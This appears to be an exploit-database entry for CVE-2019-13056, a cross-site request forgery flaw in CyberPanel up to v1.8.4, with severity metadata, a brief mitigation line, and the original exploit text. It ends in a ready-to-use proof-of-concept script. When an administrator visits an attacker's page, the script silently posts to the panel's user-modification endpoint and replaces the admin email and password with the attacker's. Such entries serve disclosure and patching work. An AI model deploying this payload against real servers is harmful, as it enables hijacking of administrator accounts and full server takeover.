CyberPanel Administrator Account Takeover

vendor:

CyberPanel

by:

Bilgi Birikim Sistemleri

8.8

CVSS

HIGH

Account Takeover

352

CWE

Product Name: CyberPanel

Affected Version From: v1.8.4

Affected Version To: v1.8.4

Patch Exists: YES

Related CWE: CVE-2019-13056

CPE: a:cyberpanel:cyberpanel

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2019

CyberPanel Administrator Account Takeover <= v1.8.4

Attacker can edit administrator's credentials like email, password. Then, access the administration panel and takeover the server. A CSRF vulnerability.

Mitigation:

Implementing CSRF protection and validating user input.

Source

Exploit-DB raw data:

# Title: CyberPanel Administrator Account Takeover <= v1.8.4
# Date: 30.06.2019
# Author: Bilgi Birikim Sistemleri
# Vendor Homepage: https://cyberpanel.net/
# Version: Up to v1.8.4.
# CVE: CVE-2019-13056
# mturkyilmaz@bilgibirikim.com & bilgibirikim.com

# Description:
# Attacker can edit administrator's credentials like email, password.
# Then, access the administration panel and takeover the server.
# A CSRF vulnerability.

# How to Reproduce:
# Attacker will create a website,
# CyberPanel administrator will visit that website,
# Administrator's e-mail and password will be changed automatically.

# PoC:
<script>
fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"attackersemail@example.org","password":"attackerspassword"}'});
</script>